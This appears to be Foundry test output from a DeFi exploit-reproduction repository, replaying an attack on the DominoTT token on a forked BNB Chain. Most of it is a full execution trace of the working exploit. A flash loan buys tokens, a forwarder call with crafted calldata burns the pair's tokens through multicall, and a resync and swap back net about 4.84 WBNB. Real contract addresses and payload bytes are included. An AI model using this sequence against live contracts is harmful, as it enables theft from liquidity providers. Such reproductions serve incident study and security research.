Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-12/DominoTT_exp.sol:50:5:
   |
50 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/DominoTT_exp.sol:68:31:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/DominoTT_exp.sol:68:47:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/DominoTT_exp.sol:68:67:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/DominoTT_exp.sol:68:88:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 510.63ms (1.77ms CPU time)

Ran 1 test for src/test/2023-12/DominoTT_exp.sol:ContractTest
[PASS] testExploit() (gas: 363173)
Logs:
  Attacker WBNB balance before attack: 0
  Attacker WBNB balance before attack: 4844466907837911894

Traces:
  [6561] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34141659 [3.414e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(DominoTT: [0x0DaBDC92aF35615443412A336344c591FaEd3f90], "DominoTT")
    │   └─ ← [Return]
    └─ ← [Stop]

  [416973] ContractTest::testExploit()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Attacker WBNB balance before attack", val: 0)
    ├─ [29649] DominoTT::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [26971] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfa8095daaf6a67469b009050f7a73bb37b97ea555ca13ae87842bbad8a15fc5e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [333769] 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476::flashLoan(500000000000000000 [5e17], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [331070] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(500000000000000000 [5e17], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000 [5e17])
    │   │   │   ├─ emit Transfer(from: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000 [5e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000002225bdc21f33941dfc → 0x0000000000000000000000000000000000000000000000221ecd66c55fe21dfc
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [276682] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000 [5e17], 0, 0x00)
    │   │   │   ├─ [98446] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(500000000000000000 [5e17], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x0DaBDC92aF35615443412A336344c591FaEd3f90], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701939570 [1.701e9])
    │   │   │   │   ├─ [8225] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, 500000000000000000 [5e17])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, value: 500000000000000000 [5e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa44e28a539d296bb66f43b4b49622e5646ea9af403159d9a4cf076922fad7a74: 0x00000000000000000000000000000000000000000000000048c5e85bbb31b166 → 0x0000000000000000000000000000000000000000000000004fb643b58ee3b166
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000006f05b59d3b20000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3184] DominoTT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   ├─ [3012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2893] 0x4f34b914D687195A73318ccC58D56D242b4dCcF6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2172773910489531517026547 [2.172e24], 5243852821823074662 [5.243e18], 1698726528 [1.698e9]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5743852821823074662 [5.743e18]
    │   │   │   │   ├─ [72734] 0x4f34b914D687195A73318ccC58D56D242b4dCcF6::swap(188707285090043259187916 [1.887e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [37704] DominoTT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 188707285090043259187916 [1.887e23])
    │   │   │   │   │   │   ├─ [37526] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 188707285090043259187916 [1.887e23]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 188707285090043259187916 [1.887e23])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x67f984d158b6ad014f10b5bb5a76c68bc01dfd9cd868ab212ea8801f062649e0: 0 → 0x0000000000000000000000000000000000000000000027f5d7a907590c22f2cc
    │   │   │   │   │   │   │   │   @ 0x3702f5076eaa375369d0a88c1d2a4cbdf5070da8f4041a8fbcc015e7f7949c08: 0x00000000000000000000000000000000000000000001cc1a4f48bcacf03cc0f3 → 0x00000000000000000000000000000000000000000001a424779fb553e419ce27
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1184] DominoTT::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1984066625399488257838631 [1.984e24]
    │   │   │   │   │   │   └─ ← [Return] 1984066625399488257838631 [1.984e24]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 5743852821823074662 [5.743e18]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1984066625399488257838631 [1.984e24], reserve1: 5743852821823074662 [5.743e18])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 500000000000000000 [5e17], amount0Out: 188707285090043259187916 [1.887e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000033e8e969eab86d4a403787a8e67d30315531ee → 0x0000000000000000000000000169e166752a03fc2f08049c458056c88e32ca5e
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000001c72e8694f5604c352f363e107003 → 0x0000000000000000000000000000000000098853c02eb3868d1d0741a956a213
    │   │   │   │   │   │   @ 8: 0x6540828000000000000048c5e85bbb31b16600000001cc1a4f48bcacf03cc0f3 → 0x657189720000000000004fb643b58ee3b16600000001a424779fb553e419ce27
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [1184] DominoTT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 188707285090043259187916 [1.887e23]
    │   │   │   │   │   └─ ← [Return] 188707285090043259187916 [1.887e23]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [2472] 0x7C4717039B89d5859c4Fbb85EDB19A6E2ce61171::getNonce(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [76454] 0x7C4717039B89d5859c4Fbb85EDB19A6E2ce61171::execute(ForwardRequest({ from: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266, to: 0x0DaBDC92aF35615443412A336344c591FaEd3f90, value: 0, gas: 5000000 [5e6], nonce: 0, data: 0xac9650d8000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000003842966c6800000000000000000000000000000000000000000001a129e9fb3cab2b4000004f34b914d687195a73318ccc58d56d242b4dccf60000000000000000 }), 0xc065407074ef2e05acdd73a1b1c96c6fa4215c8298f1b78b549d6849e3d84e475decf131b7477236ea72bb15dfb89ea226dff05cd173063e34fe9aea54e667f71b)
    │   │   │   │   ├─ [3000] PRECOMPILES::ecrecover(0x531ec64831a0a6d751c6b6a04ef157e7685e6c65a4943ed0345a6daa47eede0a, 27, 87022963225124603387546963525681256627730064999442009043756495626032668757575, 42483735486739976653642534964154399752236960323873001059654502089694994917367) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
    │   │   │   │   ├─ [47334] DominoTT::multicall([0x42966c6800000000000000000000000000000000000000000001a129e9fb3cab2b4000004f34b914d687195a73318ccc58d56d242b4dccf6])
    │   │   │   │   │   ├─ [47123] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::multicall([0x42966c6800000000000000000000000000000000000000000001a129e9fb3cab2b4000004f34b914d687195a73318ccc58d56d242b4dccf6]) [delegatecall]
    │   │   │   │   │   │   ├─ [44239] DominoTT::burn(1970000000000000000000000 [1.97e24]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [44070] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::burn(1970000000000000000000000 [1.97e24]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, to: 0x0000000000000000000000000000000000000000, value: 1970000000000000000000000 [1.97e24])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 203: 0x000000000000000000000000000000000000000001c6f307be4c4687e6000000 → 0x000000000000000000000000000000000000000001c551ddd45109dcbac00000
    │   │   │   │   │   │   │   │   │   @ 0x3702f5076eaa375369d0a88c1d2a4cbdf5070da8f4041a8fbcc015e7f7949c08: 0x00000000000000000000000000000000000000000001a424779fb553e419ce27 → 0x0000000000000000000000000000000000000000000002fa8da478a8b8d9ce27
    │   │   │   │   │   │   │   │   │   @ 406: 1 → 2
    │   │   │   │   │   │   │   │   │   @ 0x828feda00a4b64eb35101b6df8f6c29717b1ea6bae5dd03d3ddada8de0a9e7cc: 0 → 0x0000000000000000000000000000000001c551ddd45109dcbac000000208f5db
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   └─ ← [Return] [0x]
    │   │   │   │   │   └─ ← [Return] [0x]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x723077b8a1b173adc35e5f0e7e3662fd1208212cb629f9c128551ea7168da722: 0 → 1
    │   │   │   │   └─ ← [Return] true, 0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [9630] 0x4f34b914D687195A73318ccC58D56D242b4dCcF6::sync()
    │   │   │   │   ├─ [1184] DominoTT::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 14066625399488257838631 [1.406e22]
    │   │   │   │   │   └─ ← [Return] 14066625399488257838631 [1.406e22]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5743852821823074662 [5.743e18]
    │   │   │   │   ├─ emit Sync(reserve0: 14066625399488257838631 [1.406e22], reserve1: 5743852821823074662 [5.743e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x657189720000000000004fb643b58ee3b16600000001a424779fb553e419ce27 → 0x657189720000000000004fb643b58ee3b1660000000002fa8da478a8b8d9ce27
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1184] DominoTT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 188707285090043259187916 [1.887e23]
    │   │   │   │   └─ ← [Return] 188707285090043259187916 [1.887e23]
    │   │   │   ├─ [56585] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(188707285090043259187916 [1.887e23], 0, [0x0DaBDC92aF35615443412A336344c591FaEd3f90, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701939570 [1.701e9])
    │   │   │   │   ├─ [7390] DominoTT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, 188707285090043259187916 [1.887e23])
    │   │   │   │   │   ├─ [7206] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, 188707285090043259187916 [1.887e23]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, value: 188707285090043259187916 [1.887e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x67f984d158b6ad014f10b5bb5a76c68bc01dfd9cd868ab212ea8801f062649e0: 0x0000000000000000000000000000000000000000000027f5d7a907590c22f2cc → 0
    │   │   │   │   │   │   │   @ 0x3702f5076eaa375369d0a88c1d2a4cbdf5070da8f4041a8fbcc015e7f7949c08: 0x0000000000000000000000000000000000000000000002fa8da478a8b8d9ce27 → 0x000000000000000000000000000000000000000000002af0654d8001c4fcc0f3
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0x4f34b914D687195A73318ccC58D56D242b4dCcF6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 14066625399488257838631 [1.406e22], 5743852821823074662 [5.743e18], 1701939570 [1.701e9]
    │   │   │   │   ├─ [1184] DominoTT::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 202773910489531517026547 [2.027e23]
    │   │   │   │   │   └─ ← [Return] 202773910489531517026547 [2.027e23]
    │   │   │   │   ├─ [38908] 0x4f34b914D687195A73318ccC58D56D242b4dCcF6::swap(0, 5344466907837911894 [5.344e18], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5344466907837911894 [5.344e18])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4f34b914D687195A73318ccC58D56D242b4dCcF6, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5344466907837911894 [5.344e18])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa44e28a539d296bb66f43b4b49622e5646ea9af403159d9a4cf076922fad7a74: 0x0000000000000000000000000000000000000000000000004fb643b58ee3b166 → 0x000000000000000000000000000000000000000000000000058ae75f6b615e10
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000004a2b5c5623825356
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1184] DominoTT::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   │   ├─ [1012] 0xaE5be6d490C47c7417e91B7911d3A0Ce3553438d::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 202773910489531517026547 [2.027e23]
    │   │   │   │   │   │   └─ ← [Return] 202773910489531517026547 [2.027e23]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4f34b914D687195A73318ccC58D56D242b4dCcF6) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 399385913985162768 [3.993e17]
    │   │   │   │   │   ├─ emit Sync(reserve0: 202773910489531517026547 [2.027e23], reserve1: 399385913985162768 [3.993e17])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 188707285090043259187916 [1.887e23], amount1In: 0, amount0Out: 0, amount1Out: 5344466907837911894 [5.344e18], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x657189720000000000004fb643b58ee3b1660000000002fa8da478a8b8d9ce27 → 0x65718972000000000000058ae75f6b615e10000000002af0654d8001c4fcc0f3
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5344466907837911894 [5.344e18]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, 500000000000000000 [5e17])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, value: 500000000000000000 [5e17])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x0000000000000000000000000000000000000000000000221ecd66c55fe21dfc → 0x00000000000000000000000000000000000000000000002225bdc21f33941dfc
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000004a2b5c5623825356 → 0x000000000000000000000000000000000000000000000000433b00fc4fd05356
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0x828feda00a4b64eb35101b6df8f6c29717b1ea6bae5dd03d3ddada8de0a9e7cc: 0 → 0x0000000000000000000000000000000001c551ddd45109dcbac000000208f5db
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 629908841695391522300 [6.299e20]
    │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 80813262825756647347332 [8.081e22]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 629908841695391522300 [6.299e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 80813262825756647347332 [8.081e22]
    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 500000000000000000 [5e17], : 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x0000000000000000000000000000000000000000000000221ecd66c55fe21dfc → 0x00000000000000000000000000000000000000000000002225bdc21f33941dfc
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4844466907837911894 [4.844e18]
    ├─ emit log_named_uint(key: "Attacker WBNB balance before attack", val: 4844466907837911894 [4.844e18])
    ├─  storage changes:
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   @ 0xfa8095daaf6a67469b009050f7a73bb37b97ea555ca13ae87842bbad8a15fc5e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.77s (9.36s CPU time)

Ran 2 test suites in 10.80s (11.28s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
